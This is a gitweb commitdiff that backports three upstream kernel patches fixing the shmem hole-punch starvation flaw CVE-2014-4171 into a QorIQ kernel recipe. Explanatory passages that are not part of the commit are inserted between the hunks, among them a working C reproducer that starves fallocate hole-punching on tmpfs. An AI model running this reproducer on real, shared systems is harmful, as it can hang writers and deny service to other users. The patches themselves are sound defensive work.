code.ossystems Code Review - meta-freescale.git/commitdiff
mm/shmem: CVE-2014-4171
author Sona Sarmadi <sona.sarmadi@enea.com>
Tue, 17 Feb 2015 11:38:44 +0000 (12:38 +0100)
committer Zhenhua Luo <zhenhua.luo@freescale.com>
Fri, 6 Mar 2015 08:28:23 +0000 (16:28 +0800)
Fixes a denial of service flaw in the Linux kernel
built with shared memory support.

References:
http://www.openwall.com/lists/oss-security/2014/06/18/11
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4171

Signed-off-by: Sona Sarmadi <sona.sarmadi@enea.com>
meta-fsl-ppc/recipes-kernel/linux/files/0001-shmem-CVE-2014-4171.patch [new file with mode: 0644]
meta-fsl-ppc/recipes-kernel/linux/files/0002-shmem-CVE-2014-4171.patch [new file with mode: 0644]
meta-fsl-ppc/recipes-kernel/linux/files/0003-shmem-CVE-2014-4171.patch [new file with mode: 0644]
meta-fsl-ppc/recipes-kernel/linux/linux-qoriq_3.12.bb

diff --git a/meta-fsl-ppc/recipes-kernel/linux/files/0001-shmem-CVE-2014-4171.patch b/meta-fsl-ppc/recipes-kernel/linux/files/0001-shmem-CVE-2014-4171.patch
new file mode 100644 (file)
index 0000000..00ead60
--- /dev/null
+++ b/meta-fsl-ppc/recipes-kernel/linux/files/0001-shmem-CVE-2014-4171.patch
@@ -0,0 +1,141 @@
+From 8685789bd8ec12a02b07ea76df4527b055efbf20 Mon Sep 17 00:00:00 2001
+From: Hugh Dickins <hughd@google.com>
+Date: Mon, 23 Jun 2014 13:22:06 -0700
+Subject: [PATCH 1/3] shmem: fix faulting into a hole while it's punched
+
+commit f00cdc6df7d7cfcabb5b740911e6788cb0802bdb upstream.
+
+Trinity finds that mmap access to a hole while it's punched from shmem
+can prevent the madvise(MADV_REMOVE) or fallocate(FALLOC_FL_PUNCH_HOLE)
+from completing, until the reader chooses to stop; with the puncher's
+hold on i_mutex locking out all other writers until it can complete.
+
+It appears that the tmpfs fault path is too light in comparison with its
+hole-punching path, lacking an i_data_sem to obstruct it; but we don't
+want to slow down the common case.
+
+Extend shmem_fallocate()'s existing range notification mechanism, so
+shmem_fault() can refrain from faulting pages into the hole while it's
+punched, waiting instead on i_mutex (when safe to sleep; or repeatedly
+faulting when not).
+
+Upstream-Status: Backport
+
+[akpm@linux-foundation.org: coding-style fixes]
+Signed-off-by: Hugh Dickins <hughd@google.com>
+Reported-by: Sasha Levin <sasha.levin@oracle.com>
+Tested-by: Sasha Levin <sasha.levin@oracle.com>
+Cc: Dave Jones <davej@redhat.com>
+Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
+Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
+
+Signed-off-by: Jiri Slaby <jslaby@suse.cz>
+Signed-off-by: Sona Sarmadi <sona.sarmadi@enea.com>
+---
+ mm/shmem.c | 56 ++++++++++++++++++++++++++++++++++++++++++++++++++++----
+ 1 file changed, 52 insertions(+), 4 deletions(-)
+
+diff --git a/mm/shmem.c b/mm/shmem.c
+index 8297623..00d412f 100644
+--- a/mm/shmem.c
++++ b/mm/shmem.c
+@@ -80,11 +80,12 @@ static struct vfsmount *shm_mnt;
+ #define SHORT_SYMLINK_LEN 128
+ /*
+- * shmem_fallocate and shmem_writepage communicate via inode->i_private
+- * (with i_mutex making sure that it has only one user at a time):
+- * we would prefer not to enlarge the shmem inode just for that.
++ * shmem_fallocate communicates with shmem_fault or shmem_writepage via
++ * inode->i_private (with i_mutex making sure that it has only one user at
++ * a time): we would prefer not to enlarge the shmem inode just for that.
+  */
+ struct shmem_falloc {
++      int     mode;           /* FALLOC_FL mode currently operating */
+       pgoff_t start;          /* start of range currently being fallocated */
+       pgoff_t next;           /* the next page offset to be fallocated */
+       pgoff_t nr_falloced;    /* how many new pages have been fallocated */
+@@ -826,6 +827,7 @@ static int shmem_writepage(struct page *page, struct writeback_control *wbc)
+                       spin_lock(&inode->i_lock);
+                       shmem_falloc = inode->i_private;
+                       if (shmem_falloc &&
++                          !shmem_falloc->mode &&
+                           index >= shmem_falloc->start &&
+                           index < shmem_falloc->next)
+                               shmem_falloc->nr_unswapped++;
+@@ -1300,6 +1302,44 @@ static int shmem_fault(struct vm_area_struct *vma, struct vm_fault *vmf)
+       int error;
+       int ret = VM_FAULT_LOCKED;
++      /*
++       * Trinity finds that probing a hole which tmpfs is punching can
++       * prevent the hole-punch from ever completing: which in turn
++       * locks writers out with its hold on i_mutex.  So refrain from
++       * faulting pages into the hole while it's being punched, and
++       * wait on i_mutex to be released if vmf->flags permits.
++       */
++      if (unlikely(inode->i_private)) {
++              struct shmem_falloc *shmem_falloc;
++
++              spin_lock(&inode->i_lock);
++              shmem_falloc = inode->i_private;
++              if (!shmem_falloc ||
++                  shmem_falloc->mode != FALLOC_FL_PUNCH_HOLE ||
++                  vmf->pgoff < shmem_falloc->start ||
++                  vmf->pgoff >= shmem_falloc->next)
++                      shmem_falloc = NULL;
++              spin_unlock(&inode->i_lock);
++              /*
++               * i_lock has protected us from taking shmem_falloc seriously
++               * once return from shmem_fallocate() went back up that stack.
++               * i_lock does not serialize with i_mutex at all, but it does
++               * not matter if sometimes we wait unnecessarily, or sometimes
++               * miss out on waiting: we just need to make those cases rare.
++               */
++              if (shmem_falloc) {
++                      if ((vmf->flags & FAULT_FLAG_ALLOW_RETRY) &&
++                         !(vmf->flags & FAULT_FLAG_RETRY_NOWAIT)) {
++                              up_read(&vma->vm_mm->mmap_sem);
++                              mutex_lock(&inode->i_mutex);
++                              mutex_unlock(&inode->i_mutex);
++                              return VM_FAULT_RETRY;
++                      }
++                      /* cond_resched? Leave that to GUP or return to user */
++                      return VM_FAULT_NOPAGE;
++              }
++      }
++
+       error = shmem_getpage(inode, vmf->pgoff, &vmf->page, SGP_CACHE, &ret);
+       if (error)
+               return ((error == -ENOMEM) ? VM_FAULT_OOM : VM_FAULT_SIGBUS);
+@@ -1815,18 +1855,26 @@ static long shmem_fallocate(struct file *file, int mode, loff_t offset,
+       mutex_lock(&inode->i_mutex);
++      shmem_falloc.mode = mode & ~FALLOC_FL_KEEP_SIZE;
++
+       if (mode & FALLOC_FL_PUNCH_HOLE) {
+               struct address_space *mapping = file->f_mapping;
+               loff_t unmap_start = round_up(offset, PAGE_SIZE);
+               loff_t unmap_end = round_down(offset + len, PAGE_SIZE) - 1;
++              shmem_falloc.start = unmap_start >> PAGE_SHIFT;
++              shmem_falloc.next = (unmap_end + 1) >> PAGE_SHIFT;
++              spin_lock(&inode->i_lock);
++              inode->i_private = &shmem_falloc;
++              spin_unlock(&inode->i_lock);
++
+               if ((u64)unmap_end > (u64)unmap_start)
+                       unmap_mapping_range(mapping, unmap_start,
+                                           1 + unmap_end - unmap_start, 0);
+               shmem_truncate_range(inode, offset, offset + len - 1);
+               /* No need to unmap again: hole-punching leaves COWed pages */
+               error = 0;
+-              goto out;
++              goto undone;
+       }
+       /* We need to check rlimit even when FALLOC_FL_KEEP_SIZE */
+-- 
+1.9.1
+
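The starvation this first patch addresses can be demonstrated from userspace. The sketch below is illustrative only, not part of the commit: one thread keeps faulting pages of a shared tmpfs mapping back in while the main thread punches holes over the same range. On a vulnerable kernel the hole-punch, holding i_mutex, can be kept from completing for as long as the reader runs, locking out all other writers. The tmpfs path and mapping size are assumptions; build with gcc -pthread.

/*
 * Illustrative reproducer sketch for CVE-2014-4171, not part of this
 * commit.  One thread keeps faulting pages of a shared tmpfs mapping
 * while the main thread punches the same range; on an unpatched kernel
 * the fallocate() below can be starved indefinitely.  The tmpfs path
 * and mapping size are invented for illustration.
 */
#define _GNU_SOURCE             /* for fallocate() and FALLOC_FL_* */
#include <fcntl.h>
#include <pthread.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

#define MAPLEN (16 * 4096)

static char *map;
static volatile char sink;

static void *faulter(void *arg)
{
        (void)arg;
        for (;;)                        /* fault pages back into the hole */
                for (size_t i = 0; i < MAPLEN; i += 4096)
                        sink = map[i];
        return NULL;
}

int main(void)
{
        int fd = open("/dev/shm/cve-2014-4171", O_RDWR | O_CREAT, 0600);
        pthread_t t;

        if (fd < 0 || ftruncate(fd, MAPLEN) < 0)
                return 1;
        map = mmap(NULL, MAPLEN, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
        if (map == MAP_FAILED)
                return 1;
        memset(map, 0xff, MAPLEN);
        pthread_create(&t, NULL, faulter, NULL);

        for (;;)                        /* each punch races the faulter */
                if (fallocate(fd, FALLOC_FL_PUNCH_HOLE | FALLOC_FL_KEEP_SIZE,
                              0, MAPLEN) < 0) {
                        perror("fallocate");
                        return 1;
                }
}

On a fixed kernel each fallocate() call completes promptly because concurrent faults into the punched range wait instead of repopulating it.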
diff --git a/meta-fsl-ppc/recipes-kernel/linux/files/0002-shmem-CVE-2014-4171.patch b/meta-fsl-ppc/recipes-kernel/linux/files/0002-shmem-CVE-2014-4171.patch
new file mode 100644 (file)
index 0000000..a43b895
--- /dev/null
+++ b/meta-fsl-ppc/recipes-kernel/linux/files/0002-shmem-CVE-2014-4171.patch
@@ -0,0 +1,200 @@
+From 38d05809df1ea5272a658e7f4d5f2a3027ad2fd2 Mon Sep 17 00:00:00 2001
+From: Hugh Dickins <hughd@google.com>
+Date: Wed, 23 Jul 2014 14:00:10 -0700
+Subject: [PATCH 2/3] shmem: fix faulting into a hole, not taking i_mutex
+
+commit 8e205f779d1443a94b5ae81aa359cb535dd3021e upstream.
+
+Commit f00cdc6df7d7 ("shmem: fix faulting into a hole while it's
+punched") was buggy: Sasha sent a lockdep report to remind us that
+grabbing i_mutex in the fault path is a no-no (write syscall may already
+hold i_mutex while faulting user buffer).
+
+We tried a completely different approach (see following patch) but that
+proved inadequate: good enough for a rational workload, but not good
+enough against trinity - which forks off so many mappings of the object
+that contention on i_mmap_mutex while hole-puncher holds i_mutex builds
+into serious starvation when concurrent faults force the puncher to fall
+back to single-page unmap_mapping_range() searches of the i_mmap tree.
+
+So return to the original umbrella approach, but keep away from i_mutex
+this time.  We really don't want to bloat every shmem inode with a new
+mutex or completion, just to protect this unlikely case from trinity.
+So extend the original with wait_queue_head on stack at the hole-punch
+end, and wait_queue item on the stack at the fault end.
+
+This involves further use of i_lock to guard against the races: lockdep
+has been happy so far, and I see fs/inode.c:unlock_new_inode() holds
+i_lock around wake_up_bit(), which is comparable to what we do here.
+i_lock is more convenient, but we could switch to shmem's info->lock.
+
+This issue has been tagged with CVE-2014-4171, which will require commit
+f00cdc6df7d7 and this and the following patch to be backported: we
+suggest to 3.1+, though in fact the trinity forkbomb effect might go
+back as far as 2.6.16, when madvise(,,MADV_REMOVE) came in - or might
+not, since much has changed, with i_mmap_mutex a spinlock before 3.0.
+Anyone running trinity on 3.0 and earlier? I don't think we need care.
+
+Upstream-Status: Backport
+
+Signed-off-by: Hugh Dickins <hughd@google.com>
+Reported-by: Sasha Levin <sasha.levin@oracle.com>
+Tested-by: Sasha Levin <sasha.levin@oracle.com>
+Cc: Vlastimil Babka <vbabka@suse.cz>
+Cc: Konstantin Khlebnikov <koct9i@gmail.com>
+Cc: Johannes Weiner <hannes@cmpxchg.org>
+Cc: Lukas Czerner <lczerner@redhat.com>
+Cc: Dave Jones <davej@redhat.com>
+Cc: <stable@vger.kernel.org>   [3.1+]
+Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
+Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
+Signed-off-by: Jiri Slaby <jslaby@suse.cz>
+Signed-off-by: Sona Sarmadi <sona.sarmadi@enea.com>
+---
+ mm/shmem.c | 78 +++++++++++++++++++++++++++++++++++++++++---------------------
+ 1 file changed, 52 insertions(+), 26 deletions(-)
+
+diff --git a/mm/shmem.c b/mm/shmem.c
+index 00d412f..6f5626f 100644
+--- a/mm/shmem.c
++++ b/mm/shmem.c
+@@ -85,7 +85,7 @@ static struct vfsmount *shm_mnt;
+  * a time): we would prefer not to enlarge the shmem inode just for that.
+  */
+ struct shmem_falloc {
+-      int     mode;           /* FALLOC_FL mode currently operating */
++      wait_queue_head_t *waitq; /* faults into hole wait for punch to end */
+       pgoff_t start;          /* start of range currently being fallocated */
+       pgoff_t next;           /* the next page offset to be fallocated */
+       pgoff_t nr_falloced;    /* how many new pages have been fallocated */
+@@ -827,7 +827,7 @@ static int shmem_writepage(struct page *page, struct writeback_control *wbc)
+                       spin_lock(&inode->i_lock);
+                       shmem_falloc = inode->i_private;
+                       if (shmem_falloc &&
+-                          !shmem_falloc->mode &&
++                          !shmem_falloc->waitq &&
+                           index >= shmem_falloc->start &&
+                           index < shmem_falloc->next)
+                               shmem_falloc->nr_unswapped++;
+@@ -1306,38 +1306,58 @@ static int shmem_fault(struct vm_area_struct *vma, struct vm_fault *vmf)
+        * Trinity finds that probing a hole which tmpfs is punching can
+        * prevent the hole-punch from ever completing: which in turn
+        * locks writers out with its hold on i_mutex.  So refrain from
+-       * faulting pages into the hole while it's being punched, and
+-       * wait on i_mutex to be released if vmf->flags permits.
++       * faulting pages into the hole while it's being punched.  Although
++       * shmem_undo_range() does remove the additions, it may be unable to
++       * keep up, as each new page needs its own unmap_mapping_range() call,
++       * and the i_mmap tree grows ever slower to scan if new vmas are added.
++       *
++       * It does not matter if we sometimes reach this check just before the
++       * hole-punch begins, so that one fault then races with the punch:
++       * we just need to make racing faults a rare case.
++       *
++       * The implementation below would be much simpler if we just used a
++       * standard mutex or completion: but we cannot take i_mutex in fault,
++       * and bloating every shmem inode for this unlikely case would be sad.
+        */
+       if (unlikely(inode->i_private)) {
+               struct shmem_falloc *shmem_falloc;
+               spin_lock(&inode->i_lock);
+               shmem_falloc = inode->i_private;
+-              if (!shmem_falloc ||
+-                  shmem_falloc->mode != FALLOC_FL_PUNCH_HOLE ||
+-                  vmf->pgoff < shmem_falloc->start ||
+-                  vmf->pgoff >= shmem_falloc->next)
+-                      shmem_falloc = NULL;
+-              spin_unlock(&inode->i_lock);
+-              /*
+-               * i_lock has protected us from taking shmem_falloc seriously
+-               * once return from shmem_fallocate() went back up that stack.
+-               * i_lock does not serialize with i_mutex at all, but it does
+-               * not matter if sometimes we wait unnecessarily, or sometimes
+-               * miss out on waiting: we just need to make those cases rare.
+-               */
+-              if (shmem_falloc) {
++              if (shmem_falloc &&
++                  shmem_falloc->waitq &&
++                  vmf->pgoff >= shmem_falloc->start &&
++                  vmf->pgoff < shmem_falloc->next) {
++                      wait_queue_head_t *shmem_falloc_waitq;
++                      DEFINE_WAIT(shmem_fault_wait);
++
++                      ret = VM_FAULT_NOPAGE;
+                       if ((vmf->flags & FAULT_FLAG_ALLOW_RETRY) &&
+                          !(vmf->flags & FAULT_FLAG_RETRY_NOWAIT)) {
++                              /* It's polite to up mmap_sem if we can */
+                               up_read(&vma->vm_mm->mmap_sem);
+-                              mutex_lock(&inode->i_mutex);
+-                              mutex_unlock(&inode->i_mutex);
+-                              return VM_FAULT_RETRY;
++                              ret = VM_FAULT_RETRY;
+                       }
+-                      /* cond_resched? Leave that to GUP or return to user */
+-                      return VM_FAULT_NOPAGE;
++
++                      shmem_falloc_waitq = shmem_falloc->waitq;
++                      prepare_to_wait(shmem_falloc_waitq, &shmem_fault_wait,
++                                      TASK_UNINTERRUPTIBLE);
++                      spin_unlock(&inode->i_lock);
++                      schedule();
++
++                      /*
++                       * shmem_falloc_waitq points into the shmem_fallocate()
++                       * stack of the hole-punching task: shmem_falloc_waitq
++                       * is usually invalid by the time we reach here, but
++                       * finish_wait() does not dereference it in that case;
++                       * though i_lock needed lest racing with wake_up_all().
++                       */
++                      spin_lock(&inode->i_lock);
++                      finish_wait(shmem_falloc_waitq, &shmem_fault_wait);
++                      spin_unlock(&inode->i_lock);
++                      return ret;
+               }
++              spin_unlock(&inode->i_lock);
+       }
+       error = shmem_getpage(inode, vmf->pgoff, &vmf->page, SGP_CACHE, &ret);
+@@ -1855,13 +1875,13 @@ static long shmem_fallocate(struct file *file, int mode, loff_t offset,
+       mutex_lock(&inode->i_mutex);
+-      shmem_falloc.mode = mode & ~FALLOC_FL_KEEP_SIZE;
+-
+       if (mode & FALLOC_FL_PUNCH_HOLE) {
+               struct address_space *mapping = file->f_mapping;
+               loff_t unmap_start = round_up(offset, PAGE_SIZE);
+               loff_t unmap_end = round_down(offset + len, PAGE_SIZE) - 1;
++              DECLARE_WAIT_QUEUE_HEAD_ONSTACK(shmem_falloc_waitq);
++              shmem_falloc.waitq = &shmem_falloc_waitq;
+               shmem_falloc.start = unmap_start >> PAGE_SHIFT;
+               shmem_falloc.next = (unmap_end + 1) >> PAGE_SHIFT;
+               spin_lock(&inode->i_lock);
+@@ -1873,8 +1893,13 @@ static long shmem_fallocate(struct file *file, int mode, loff_t offset,
+                                           1 + unmap_end - unmap_start, 0);
+               shmem_truncate_range(inode, offset, offset + len - 1);
+               /* No need to unmap again: hole-punching leaves COWed pages */
++
++              spin_lock(&inode->i_lock);
++              inode->i_private = NULL;
++              wake_up_all(&shmem_falloc_waitq);
++              spin_unlock(&inode->i_lock);
+               error = 0;
+-              goto undone;
++              goto out;
+       }
+       /* We need to check rlimit even when FALLOC_FL_KEEP_SIZE */
+@@ -1890,6 +1915,7 @@ static long shmem_fallocate(struct file *file, int mode, loff_t offset,
+               goto out;
+       }
++      shmem_falloc.waitq = NULL;
+       shmem_falloc.start = start;
+       shmem_falloc.next  = start;
+       shmem_falloc.nr_falloced = 0;
+-- 
+1.9.1
+
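Patch 2 replaces the i_mutex round trip (illegal in the fault path) with a wait_queue_head_t on the hole-puncher's stack: shmem_fallocate() publishes a pointer to it through inode->i_private under i_lock, faulting tasks sleep on it, and the puncher clears the pointer and calls wake_up_all() before returning. A minimal userspace analogue of that shape, with a pthread condition variable standing in for the kernel waitqueue (all names below are invented for illustration; build with gcc -pthread):

/*
 * Userspace analogue of the on-stack waitqueue pattern; not kernel
 * code.  The "puncher" (main) publishes a pointer to a condition
 * variable on its own stack, a "faulter" that sees the pointer sleeps
 * on it, and the puncher clears the pointer and wakes everyone before
 * the frame can go away (here pthread_join() keeps the frame alive
 * until the waiter is done).
 */
#include <pthread.h>
#include <stdio.h>
#include <unistd.h>

static pthread_mutex_t lock = PTHREAD_MUTEX_INITIALIZER;
static pthread_cond_t *active_punch;    /* plays the role of inode->i_private */

static void *faulter(void *arg)
{
        (void)arg;
        pthread_mutex_lock(&lock);
        while (active_punch)            /* hole being punched: wait it out */
                pthread_cond_wait(active_punch, &lock);
        pthread_mutex_unlock(&lock);
        puts("fault proceeds after the punch completed");
        return NULL;
}

int main(void)
{
        pthread_cond_t punch_done = PTHREAD_COND_INITIALIZER;   /* on stack */
        pthread_t t;

        pthread_mutex_lock(&lock);
        active_punch = &punch_done;     /* publish, as shmem_fallocate() does */
        pthread_mutex_unlock(&lock);

        pthread_create(&t, NULL, faulter, NULL);
        sleep(1);                       /* stand-in for the actual hole-punch */

        pthread_mutex_lock(&lock);
        active_punch = NULL;            /* unpublish before waking, under lock */
        pthread_cond_broadcast(&punch_done);
        pthread_mutex_unlock(&lock);

        pthread_join(t, NULL);
        return 0;
}

Clearing the pointer and waking under the same lock is the load-bearing detail: a late waiter either sees the pointer and sleeps before the wakeup, or sees NULL and never touches the soon-dead stack frame. That is the role i_lock plays around wake_up_all() in the patch.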
diff --git a/meta-fsl-ppc/recipes-kernel/linux/files/0003-shmem-CVE-2014-4171.patch b/meta-fsl-ppc/recipes-kernel/linux/files/0003-shmem-CVE-2014-4171.patch
new file mode 100644 (file)
index 0000000..2b70ec1
--- /dev/null
+++ b/meta-fsl-ppc/recipes-kernel/linux/files/0003-shmem-CVE-2014-4171.patch
@@ -0,0 +1,134 @@
+From a428dc008e435c5a36b1288fb5b8c4b58472e28c Mon Sep 17 00:00:00 2001
+From: Hugh Dickins <hughd@google.com>
+Date: Wed, 23 Jul 2014 14:00:13 -0700
+Subject: [PATCH 3/3] shmem: fix splicing from a hole while it's punched
+
+commit b1a366500bd537b50c3aad26dc7df083ec03a448 upstream.
+
+shmem_fault() is the actual culprit in trinity's hole-punch starvation,
+and the most significant cause of such problems: since a page faulted is
+one that then appears page_mapped(), needing unmap_mapping_range() and
+i_mmap_mutex to be unmapped again.
+
+But it is not the only way in which a page can be brought into a hole in
+the radix_tree while that hole is being punched; and Vlastimil's testing
+implies that if enough other processors are busy filling in the hole,
+then shmem_undo_range() can be kept from completing indefinitely.
+
+shmem_file_splice_read() is the main other user of SGP_CACHE, which can
+instantiate shmem pagecache pages in the read-only case (without holding
+i_mutex, so perhaps concurrently with a hole-punch).  Probably it's
+silly not to use SGP_READ already (using the ZERO_PAGE for holes): which
+ought to be safe, but might bring surprises - not a change to be rushed.
+
+shmem_read_mapping_page_gfp() is an internal interface used by
+drivers/gpu/drm GEM (and next by uprobes): it should be okay.  And
+shmem_file_read_iter() uses the SGP_DIRTY variant of SGP_CACHE, when
+called internally by the kernel (perhaps for a stacking filesystem,
+which might rely on holes to be reserved): it's unclear whether it could
+be provoked to keep hole-punch busy or not.
+
+We could apply the same umbrella as now used in shmem_fault() to
+shmem_file_splice_read() and the others; but it looks ugly, and use over
+a range raises questions - should it actually be per page? can these get
+starved themselves?
+
+The origin of this part of the problem is my v3.1 commit d0823576bf4b
+("mm: pincer in truncate_inode_pages_range"), once it was duplicated
+into shmem.c.  It seemed like a nice idea at the time, to ensure
+(barring RCU lookup fuzziness) that there's an instant when the entire
+hole is empty; but the indefinitely repeated scans to ensure that make
+it vulnerable.
+
+Revert that "enhancement" to hole-punch from shmem_undo_range(), but
+retain the unproblematic rescanning when it's truncating; add a couple
+of comments there.
+
+Remove the "indices[0] >= end" test: that is now handled satisfactorily
+by the inner loop, and mem_cgroup_uncharge_start()/end() are too light
+to be worth avoiding here.
+
+But if we do not always loop indefinitely, we do need to handle the case
+of swap swizzled back to page before shmem_free_swap() gets it: add a
+retry for that case, as suggested by Konstantin Khlebnikov; and for the
+case of page swizzled back to swap, as suggested by Johannes Weiner.
+
+Upstream-Status: Backport
+
+Signed-off-by: Hugh Dickins <hughd@google.com>
+Reported-by: Sasha Levin <sasha.levin@oracle.com>
+Suggested-by: Vlastimil Babka <vbabka@suse.cz>
+Cc: Konstantin Khlebnikov <koct9i@gmail.com>
+Cc: Johannes Weiner <hannes@cmpxchg.org>
+Cc: Lukas Czerner <lczerner@redhat.com>
+Cc: Dave Jones <davej@redhat.com>
+Cc: <stable@vger.kernel.org>   [3.1+]
+Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
+Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
+Signed-off-by: Jiri Slaby <jslaby@suse.cz>
+Signed-off-by: Sona Sarmadi <sona.sarmadi@enea.com>
+---
+ mm/shmem.c | 24 +++++++++++++++---------
+ 1 file changed, 15 insertions(+), 9 deletions(-)
+
+diff --git a/mm/shmem.c b/mm/shmem.c
+index 6f5626f..0da81aa 100644
+--- a/mm/shmem.c
++++ b/mm/shmem.c
+@@ -534,22 +534,19 @@ static void shmem_undo_range(struct inode *inode, loff_t lstart, loff_t lend,
+               return;
+       index = start;
+-      for ( ; ; ) {
++      while (index < end) {
+               cond_resched();
+               pvec.nr = shmem_find_get_pages_and_swap(mapping, index,
+                               min(end - index, (pgoff_t)PAGEVEC_SIZE),
+                                                       pvec.pages, indices);
+               if (!pvec.nr) {
+-                      if (index == start || unfalloc)
++                      /* If all gone or hole-punch or unfalloc, we're done */
++                      if (index == start || end != -1)
+                               break;
++                      /* But if truncating, restart to make sure all gone */
+                       index = start;
+                       continue;
+               }
+-              if ((index == start || unfalloc) && indices[0] >= end) {
+-                      shmem_deswap_pagevec(&pvec);
+-                      pagevec_release(&pvec);
+-                      break;
+-              }
+               mem_cgroup_uncharge_start();
+               for (i = 0; i < pagevec_count(&pvec); i++) {
+                       struct page *page = pvec.pages[i];
+@@ -561,8 +558,12 @@ static void shmem_undo_range(struct inode *inode, loff_t lstart, loff_t lend,
+                       if (radix_tree_exceptional_entry(page)) {
+                               if (unfalloc)
+                                       continue;
+-                              nr_swaps_freed += !shmem_free_swap(mapping,
+-                                                              index, page);
++                              if (shmem_free_swap(mapping, index, page)) {
++                                      /* Swap was replaced by page: retry */
++                                      index--;
++                                      break;
++                              }
++                              nr_swaps_freed++;
+                               continue;
+                       }
+@@ -571,6 +572,11 @@ static void shmem_undo_range(struct inode *inode, loff_t lstart, loff_t lend,
+                               if (page->mapping == mapping) {
+                                       VM_BUG_ON(PageWriteback(page));
+                                       truncate_inode_page(mapping, page);
++                              } else {
++                                      /* Page was replaced by swap: retry */
++                                      unlock_page(page);
++                                      index--;
++                                      break;
+                               }
+                       }
+                       unlock_page(page);
+-- 
+1.9.1
+
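The shmem_undo_range() rework in patch 3 drops the reverted "pincer" rescanning in favour of a single forward pass that retries only a slot whose entry changed underneath it: on a swizzle the inner loop does index--; break; so the outer loop re-reads the same offset. A toy sketch of that retry idiom (invented data, not kernel code):

/*
 * Toy sketch of the retry-by-stepping-back idiom from patch 3; the
 * slot array and the simulated "swizzle" are invented for illustration.
 * A single forward pass frees every slot, revisiting an index only when
 * the entry changed between the batched lookup and the free.
 */
#include <stdio.h>

enum entry { EMPTY, PAGE, SWAP };

static enum entry slots[8] = { PAGE, SWAP, PAGE, PAGE, SWAP, PAGE, EMPTY, PAGE };
static int swizzled;                    /* slot 3 changes under us once */

static enum entry read_slot(int i)      /* re-read, simulating a racer */
{
        if (i == 3 && !swizzled) {
                swizzled = 1;
                slots[3] = SWAP;        /* page swizzled back to swap */
        }
        return slots[i];
}

int main(void)
{
        for (int index = 0; index < 8; index++) {
                enum entry expected = slots[index];     /* batched lookup */
                enum entry now = read_slot(index);

                if (now != expected) {
                        printf("slot %d changed, retrying it\n", index);
                        index--;        /* like "index--; break;" above */
                        continue;
                }
                slots[index] = EMPTY;   /* free what we expected to find */
        }
        puts("one forward pass completed despite the concurrent change");
        return 0;
}

Unlike the pincer, a slot that keeps changing delays only itself; the pass never restarts from the beginning, which is what made the hole-punch starvable.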
diff --git a/meta-fsl-ppc/recipes-kernel/linux/linux-qoriq_3.12.bb b/meta-fsl-ppc/recipes-kernel/linux/linux-qoriq_3.12.bb
index 7bf8b223cc38715b4b15c920bdbf2b5bc9447d2c..9727a7341f7c82443f73f9dc9b38eac7fb549f62 100644 (file)
--- a/meta-fsl-ppc/recipes-kernel/linux/linux-qoriq_3.12.bb
+++ b/meta-fsl-ppc/recipes-kernel/linux/linux-qoriq_3.12.bb
@@ -31,6 +31,9 @@ SRC_URI = "git://git.freescale.com/ppc/sdk/linux.git;nobranch=1 \
     file://0002-ALSA-CVE-2014-4656.patch \
     file://target-CVE-2014-4027.patch \
     file://mm-2014-3122.patch \
+    file://0001-shmem-CVE-2014-4171.patch \
+    file://0002-shmem-CVE-2014-4171.patch \
+    file://0003-shmem-CVE-2014-4171.patch \
 "
 SRCREV = "6619b8b55796cdf0cec04b66a71288edd3057229"